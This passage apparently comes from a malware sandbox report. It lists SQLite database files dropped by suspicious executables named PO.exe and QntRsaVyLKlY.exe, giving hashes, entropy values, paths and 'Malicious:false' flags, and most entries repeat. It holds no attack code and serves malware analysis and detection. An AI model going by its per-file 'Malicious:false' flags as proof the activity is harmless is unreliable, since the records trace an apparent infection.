                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):98304
                      Entropy (8bit):0.08235737944063153
                      Encrypted:false
                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):98304
                      Entropy (8bit):0.08235737944063153
                      Encrypted:false
                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
